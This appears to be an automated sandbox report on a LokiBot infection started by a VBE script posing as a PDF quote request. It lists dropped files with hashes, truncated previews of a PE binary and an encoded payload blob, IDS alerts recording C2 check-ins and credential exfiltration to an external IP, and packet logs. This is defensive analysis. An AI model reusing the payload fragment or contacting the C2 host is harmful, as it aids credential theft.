                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vu00q5i3.ua0.ps1

                        Download File
                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with no line terminators
                        Category:dropped
                        Size (bytes):60
                        Entropy (8bit):4.038920595031593
                        Encrypted:false
                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                        Malicious:false
                        Preview:# PowerShell test file to determine AppLocker lockdown mode

                        C:\Users\user\AppData\Roaming\188E93\31437F.exe

                        Download File
                        Process:C:\Windows\SysWOW64\dxdiag.exe
                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Category:dropped
                        Size (bytes):222720
                        Entropy (8bit):5.934092890012391
                        Encrypted:false
                        SSDEEP:3072:MMlaJEzHyusOl081O6Zdtx7SNchIarfvdNpNXXR2P9K:k0HF/1l9lhIabdNpNMP
                        MD5:24D3F0DB6CCF0C341EA4F6B206DF2EDF
                        SHA1:B65ED4B4B1FB9CC5C128EE48A0B7CD326BA3AC93
                        SHA-256:C36C36C2945802FEB2195AD271C98F994B22A09F6CF2A1764A190865D1D6CE2B
                        SHA-512:7C4CC31303C59903E74B29B6EC14138611567A09281A4728D2B2A9B170E14344395173C1D97DF34B2F0391BC7365AC856884643C857325C3EA293AEF643C53E7
                        Malicious:false
                        Antivirus:
                        • Antivirus: ReversingLabs, Detection: 0%
                        • Antivirus: Virustotal, Detection: 0%, Browse
                        Joe Sandbox View:
                        • Filename: Solicitud de presupuesto 09-30-2024#U00b7pdf.vbs, Detection: malicious, Browse
                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D@C..!-..!-..!-..Y...!-..J...!-..J)..!-..J,..!-..!,..%-..J$..!-..J(."!-..J..!-..J..!-..J/..!-.Rich.!-.........................PE..L...)c............................................@.......................................@...... ......................................Xt...................p..."..p...T...........................X................................................text...d........................... ..`.data...............................@....idata..*...........................@..@.rsrc...Xt.......v..................@..@.reloc..."...p...$...B..............@..B........................................................................................................................................................................................................................................................................................................

                        C:\Users\user\AppData\Roaming\188E93\31437F.lck

                        Download File
                        Process:C:\Windows\SysWOW64\dxdiag.exe
                        File Type:very short file (no magic)
                        Category:dropped
                        Size (bytes):1
                        Entropy (8bit):0.0
                        Encrypted:false
                        SSDEEP:3:U:U
                        MD5:C4CA4238A0B923820DCC509A6F75849B
                        SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                        SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                        SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                        Malicious:false
                        Preview:1

                        C:\Users\user\AppData\Roaming\Drgs.Trs

                        Download File
                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        File Type:ASCII text, with very long lines (65536), with no line terminators
                        Category:dropped
                        Size (bytes):453852
                        Entropy (8bit):5.973220528496078
                        Encrypted:false
                        SSDEEP:6144:zL1MpG+9CZNDUbTy5RHEMwRiLMJFQ9E/oyAMtAX8dSPU+WAtamERSk4TekNM5A:zSCTUbTyDEiMvQu/odM8EkSAtQRSMW
                        MD5:AEA8E7EFE3BDC3CB31B936D38D0453D7
                        SHA1:AE85CF7B5691A9E873F92BCA97AA1A3E0A1CE13A
                        SHA-256:583DD45F990D328F7E7B098A3215ED9E765CB4456346BB67ADFF0D9007AF88A7
                        SHA-512:DD8962BF1E8DD6C2DECBAA97E2B2165DE542EA02E1FF8727031B038C0318813C955C8A24437E44CCC87C17F7D7EC543DD1A5F719CB9C709E34F40004F70F6F64
                        Malicious:false
                        Preview:6wIv/esC6gm7z/EQAHEBm3EBmwNcJATrAq0fcQGbuYurq0JxAZtxAZuB6TS/W0PrAsdn6wKRMoHBqROwAOsC6KvrAsjE6wLxhesC4HK6zEngw+sCL4DrAlZG6wJQuusC8UUxynEBm3EBm4kUC+sCmezrAlj40eJxAZvrAglog8EE6wK4CXEBm4H58SCkAnzKcQGbcQGbi0QkBOsCkyjrAjBWicNxAZvrAvAJgcPTgRcCcQGbcQGburMCuDtxAZtxAZuB8twol1TrAgVzcQGbgfJvKi9v6wKpousCG3HrApBHcQGb6wLRsOsCNleLDBBxAZvrAkS+iQwT6wJj9HEBm0LrAu7WcQGbgfokuAQAddTrAtgEcQGbiVwkDHEBm+sCEB2B7QADAADrAljOcQGbi1QkCOsCjbHrApkFi3wkBHEBm3EBm4nr6wJK7esCs9uBw5wAAADrArk4cQGbU3EBm3EBm2pAcQGb6wLn14nrcQGbcQGbx4MAAQAAACC4AusCNnxxAZuBwwABAADrAkc86wJNY1PrAlXxcQGbietxAZvrAm0qibsEAQAAcQGbcQGbgcMEAQAA6wJjrusCAR1T6wIK6esCO6pq/3EBm+sCF7CDwgVxAZvrAjDtMfZxAZtxAZsxyXEBm+sCJsKLGnEBm+sC+CtBcQGb6wLv5jkcCnXzcQGb6wI7qEbrAncy6wL9dYB8Cvu4ddzrAjOpcQGbi0QK/HEBm3EBmynwcQGb6wIsWP/S6wJzdnEBm7okuAQA6wLs2esCfYExwOsCyQXrAt3qi3wkDHEBm3EBm4E0Bya7dkjrAvMj6wLkmIPABOsCitFxAZs50HXj6wI5LnEBm4n7cQGbcQGb/9dxAZvrAqRqr16xDb4zQinHOgPQ0wkB+KfO7qhTO+PJSyPruLB/OrdrIwOyczKTcNoCpaEAK06up0rtZiBq97nzE8mxp0Iy28Kk97mj1Onw4f97SAlZ1tmiYPc8K7vpzPN59zwr

                        C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-2246122658-3693405117-2476756634-1003\89dad5d484a9f889a3a8dfca823edc3e_9e146be9-c76a-4720-bcdb-53011b87bd06

                        Download File
                        Process:C:\Windows\SysWOW64\dxdiag.exe
                        File Type:data
                        Category:dropped
                        Size (bytes):47
                        Entropy (8bit):1.168829563685559
                        Encrypted:false
                        SSDEEP:3:/lSll2DQi:AoMi
                        MD5:DAB633BEBCCE13575989DCFA4E2203D6
                        SHA1:33186D50F04C5B5196C1FCC1FAD17894B35AC6C7
                        SHA-256:1C00FBA1B82CD386E866547F33E1526B03F59E577449792D99C882DEF05A1D17
                        SHA-512:EDDBB22D9FC6065B8F5376EC95E316E7569530EFAA9EA9BC641881D763B91084DCCC05BC793E8E29131D20946392A31BD943E8FC632D91EE13ABA7B0CD1C626F
                        Malicious:false
                        Preview:........................................user.

                        Static File Info

                        General

                        File type:ASCII text, with CRLF line terminators
                        Entropy (8bit):4.88802523352518
                        TrID:
                        • Visual Basic Script (13500/0) 100.00%
                        File name:PRORA#U010cUNSKA ZAHTEVA 09-30-2024#U00b7pdf.vbe
                        File size:74'801 bytes
                        MD5:ae06697b71084618bb9a2d051f6fad2f
                        SHA1:d3cc11739d47aebc183e425750d53ea0d412c8e0
                        SHA256:dc6607f4aa63d04407994442f3f085ccd29a2feadac2a791b90cdbcfee2f5fac
                        SHA512:ea85577950701655694c970ac44a9f80ccca80f59166d0955d946570493b374f364c9fafefd548af04b8d5ebb6d494be64b840fdb55df00070b84bd4ef5dff34
                        SSDEEP:1536:sM0x6oY5kcFA/RYq0KkFV8N+FhhxGEoU5J/Gbrf:sM0xlYAJYJFFhhFo9f
                        TLSH:EE733C11DBD73F3E8D4623DDB94905F78D7A81F8713580FCA58D862A3022A78DA7E264
                        File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi

                        File Icon

                        Icon Hash:68d69b8f86ab9a86

                        Network Behavior

                        Suricata IDS Alerts

                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                        2024-10-01T07:46:57.524026+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.549713142.250.184.238443TCP
                        2024-10-01T07:47:02.251203+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549715137.184.191.21580TCP
                        2024-10-01T07:47:02.251203+02002025381ET MALWARE LokiBot Checkin1192.168.2.549715137.184.191.21580TCP
                        2024-10-01T07:47:04.843116+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.549715137.184.191.21580TCP
                        2024-10-01T07:47:04.932136+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549716137.184.191.21580TCP
                        2024-10-01T07:47:04.932136+02002025381ET MALWARE LokiBot Checkin1192.168.2.549716137.184.191.21580TCP
                        2024-10-01T07:47:07.607129+02002024312ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M11192.168.2.549716137.184.191.21580TCP
                        2024-10-01T07:47:07.728144+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549717137.184.191.21580TCP
                        2024-10-01T07:47:07.728144+02002025381ET MALWARE LokiBot Checkin1192.168.2.549717137.184.191.21580TCP
                        2024-10-01T07:47:10.358161+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549717137.184.191.21580TCP
                        2024-10-01T07:47:10.515717+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549718137.184.191.21580TCP
                        2024-10-01T07:47:10.515717+02002025381ET MALWARE LokiBot Checkin1192.168.2.549718137.184.191.21580TCP
                        2024-10-01T07:47:13.404925+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549718137.184.191.21580TCP
                        2024-10-01T07:47:13.564544+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549719137.184.191.21580TCP
                        2024-10-01T07:47:13.564544+02002025381ET MALWARE LokiBot Checkin1192.168.2.549719137.184.191.21580TCP
                        2024-10-01T07:47:16.115599+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549719137.184.191.21580TCP
                        2024-10-01T07:47:16.278702+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549721137.184.191.21580TCP
                        2024-10-01T07:47:16.278702+02002025381ET MALWARE LokiBot Checkin1192.168.2.549721137.184.191.21580TCP
                        2024-10-01T07:47:18.943117+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549721137.184.191.21580TCP
                        2024-10-01T07:47:19.097881+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549722137.184.191.21580TCP
                        2024-10-01T07:47:19.097881+02002025381ET MALWARE LokiBot Checkin1192.168.2.549722137.184.191.21580TCP
                        2024-10-01T07:47:21.708727+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549722137.184.191.21580TCP
                        2024-10-01T07:47:21.877834+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549723137.184.191.21580TCP
                        2024-10-01T07:47:21.877834+02002025381ET MALWARE LokiBot Checkin1192.168.2.549723137.184.191.21580TCP
                        2024-10-01T07:47:24.486909+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549723137.184.191.21580TCP
                        2024-10-01T07:47:24.642067+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549724137.184.191.21580TCP
                        2024-10-01T07:47:24.642067+02002025381ET MALWARE LokiBot Checkin1192.168.2.549724137.184.191.21580TCP
                        2024-10-01T07:47:27.345096+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549724137.184.191.21580TCP
                        2024-10-01T07:47:27.499223+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549725137.184.191.21580TCP
                        2024-10-01T07:47:27.499223+02002025381ET MALWARE LokiBot Checkin1192.168.2.549725137.184.191.21580TCP
                        2024-10-01T07:47:30.154608+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549725137.184.191.21580TCP
                        2024-10-01T07:47:30.316653+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549726137.184.191.21580TCP
                        2024-10-01T07:47:30.316653+02002025381ET MALWARE LokiBot Checkin1192.168.2.549726137.184.191.21580TCP
                        2024-10-01T07:47:32.878745+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549726137.184.191.21580TCP
                        2024-10-01T07:47:33.034241+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549727137.184.191.21580TCP
                        2024-10-01T07:47:33.034241+02002025381ET MALWARE LokiBot Checkin1192.168.2.549727137.184.191.21580TCP
                        2024-10-01T07:47:35.676257+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549727137.184.191.21580TCP
                        2024-10-01T07:47:35.829673+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549728137.184.191.21580TCP
                        2024-10-01T07:47:35.829673+02002025381ET MALWARE LokiBot Checkin1192.168.2.549728137.184.191.21580TCP
                        2024-10-01T07:47:38.454235+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549728137.184.191.21580TCP
                        2024-10-01T07:47:38.621072+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549729137.184.191.21580TCP
                        2024-10-01T07:47:38.621072+02002025381ET MALWARE LokiBot Checkin1192.168.2.549729137.184.191.21580TCP
                        2024-10-01T07:47:41.422964+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549729137.184.191.21580TCP
                        2024-10-01T07:47:41.697900+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549730137.184.191.21580TCP
                        2024-10-01T07:47:41.697900+02002025381ET MALWARE LokiBot Checkin1192.168.2.549730137.184.191.21580TCP
                        2024-10-01T07:47:44.201081+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549730137.184.191.21580TCP
                        2024-10-01T07:47:44.372628+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549731137.184.191.21580TCP
                        2024-10-01T07:47:44.372628+02002025381ET MALWARE LokiBot Checkin1192.168.2.549731137.184.191.21580TCP
                        2024-10-01T07:47:46.917412+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549731137.184.191.21580TCP
                        2024-10-01T07:47:47.079801+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549732137.184.191.21580TCP
                        2024-10-01T07:47:47.079801+02002025381ET MALWARE LokiBot Checkin1192.168.2.549732137.184.191.21580TCP
                        2024-10-01T07:47:49.642741+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549732137.184.191.21580TCP
                        2024-10-01T07:47:49.795411+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549733137.184.191.21580TCP
                        2024-10-01T07:47:49.795411+02002025381ET MALWARE LokiBot Checkin1192.168.2.549733137.184.191.21580TCP
                        2024-10-01T07:47:52.405586+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549733137.184.191.21580TCP
                        2024-10-01T07:47:52.566806+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549734137.184.191.21580TCP
                        2024-10-01T07:47:52.566806+02002025381ET MALWARE LokiBot Checkin1192.168.2.549734137.184.191.21580TCP
                        2024-10-01T07:47:55.095844+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549734137.184.191.21580TCP
                        2024-10-01T07:47:55.539715+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549735137.184.191.21580TCP
                        2024-10-01T07:47:55.539715+02002025381ET MALWARE LokiBot Checkin1192.168.2.549735137.184.191.21580TCP
                        2024-10-01T07:47:58.090306+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549735137.184.191.21580TCP
                        2024-10-01T07:47:58.249624+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549736137.184.191.21580TCP
                        2024-10-01T07:47:58.249624+02002025381ET MALWARE LokiBot Checkin1192.168.2.549736137.184.191.21580TCP
                        2024-10-01T07:48:00.871063+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549736137.184.191.21580TCP
                        2024-10-01T07:48:01.034428+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549737137.184.191.21580TCP
                        2024-10-01T07:48:01.034428+02002025381ET MALWARE LokiBot Checkin1192.168.2.549737137.184.191.21580TCP
                        2024-10-01T07:48:03.631363+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549737137.184.191.21580TCP
                        2024-10-01T07:48:03.781971+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549738137.184.191.21580TCP
                        2024-10-01T07:48:03.781971+02002025381ET MALWARE LokiBot Checkin1192.168.2.549738137.184.191.21580TCP
                        2024-10-01T07:48:06.420098+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549738137.184.191.21580TCP
                        2024-10-01T07:48:06.581937+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549739137.184.191.21580TCP
                        2024-10-01T07:48:06.581937+02002025381ET MALWARE LokiBot Checkin1192.168.2.549739137.184.191.21580TCP
                        2024-10-01T07:48:09.193755+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549739137.184.191.21580TCP
                        2024-10-01T07:48:09.408894+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549740137.184.191.21580TCP
                        2024-10-01T07:48:09.408894+02002025381ET MALWARE LokiBot Checkin1192.168.2.549740137.184.191.21580TCP
                        2024-10-01T07:48:12.018888+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549740137.184.191.21580TCP
                        2024-10-01T07:48:12.173913+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549741137.184.191.21580TCP
                        2024-10-01T07:48:12.173913+02002025381ET MALWARE LokiBot Checkin1192.168.2.549741137.184.191.21580TCP
                        2024-10-01T07:48:14.774319+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549741137.184.191.21580TCP
                        2024-10-01T07:48:14.938921+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549742137.184.191.21580TCP
                        2024-10-01T07:48:14.938921+02002025381ET MALWARE LokiBot Checkin1192.168.2.549742137.184.191.21580TCP
                        2024-10-01T07:48:17.521559+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549742137.184.191.21580TCP
                        2024-10-01T07:48:17.676415+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549743137.184.191.21580TCP
                        2024-10-01T07:48:17.676415+02002025381ET MALWARE LokiBot Checkin1192.168.2.549743137.184.191.21580TCP
                        2024-10-01T07:48:20.266760+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549743137.184.191.21580TCP
                        2024-10-01T07:48:20.422456+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549744137.184.191.21580TCP
                        2024-10-01T07:48:20.422456+02002025381ET MALWARE LokiBot Checkin1192.168.2.549744137.184.191.21580TCP
                        2024-10-01T07:48:23.061415+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549744137.184.191.21580TCP
                        2024-10-01T07:48:23.217240+02002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.549745137.184.191.21580TCP
                        2024-10-01T07:48:23.217240+02002025381ET MALWARE LokiBot Checkin1192.168.2.549745137.184.191.21580TCP
                        2024-10-01T07:48:25.861936+02002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.549745137.184.191.21580TCP

                        Network Port Distribution

                        TCP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Oct 1, 2024 07:46:24.123316050 CEST49704443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:24.123357058 CEST44349704142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:24.123429060 CEST49704443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:24.130347967 CEST49704443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:24.130362988 CEST44349704142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:24.765940905 CEST44349704142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:24.766027927 CEST49704443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:24.767127037 CEST44349704142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:24.767179966 CEST49704443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:24.770939112 CEST49704443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:24.770947933 CEST44349704142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:24.771195889 CEST44349704142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:24.782233953 CEST49704443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:24.823396921 CEST44349704142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:25.169919968 CEST44349704142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:25.170521975 CEST44349704142.250.184.238192.168.2.5
                        Oct 1, 2024 07:46:25.170588970 CEST49704443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:25.174563885 CEST49704443192.168.2.5142.250.184.238
                        Oct 1, 2024 07:46:25.184264898 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:25.184310913 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:25.184376955 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:25.184779882 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:25.184797049 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:25.828139067 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:25.828318119 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:25.831680059 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:25.831722021 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:25.831990957 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:25.832978010 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:25.879420042 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.438951015 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.439042091 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.444952965 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.445024014 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.457463026 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.457514048 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.457546949 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.457562923 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.457609892 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.463691950 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.515876055 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.527688026 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.527853012 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.527913094 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.527951956 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.528598070 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.528657913 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.528669119 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.534853935 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.534930944 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.534951925 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.541292906 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.541358948 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.541377068 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.547272921 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.547352076 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.547379971 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.553742886 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.553812027 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.553838968 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.560142040 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.560225964 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.560235023 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.566334963 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.566399097 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.566410065 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.572221041 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.572334051 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.572397947 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.577702999 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.577785015 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.577795029 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.583637953 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.583739042 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.583751917 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.592119932 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.592279911 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.592314005 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.615973949 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.616010904 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.616035938 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.616063118 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.616091013 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.616189957 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.616239071 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.616262913 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.616851091 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.616910934 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.616928101 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.618339062 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.618397951 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.618426085 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.622977972 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.623038054 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.623071909 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.626507044 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.626559973 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.626586914 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.630558968 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.630649090 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.630686045 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.634877920 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.634933949 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.634954929 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.638808966 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.638873100 CEST49705443192.168.2.5142.250.184.193
                        Oct 1, 2024 07:46:28.638890982 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.643002987 CEST44349705142.250.184.193192.168.2.5
                        Oct 1, 2024 07:46:28.643062115 CEST49705443192.168.2.5142.250.184.193
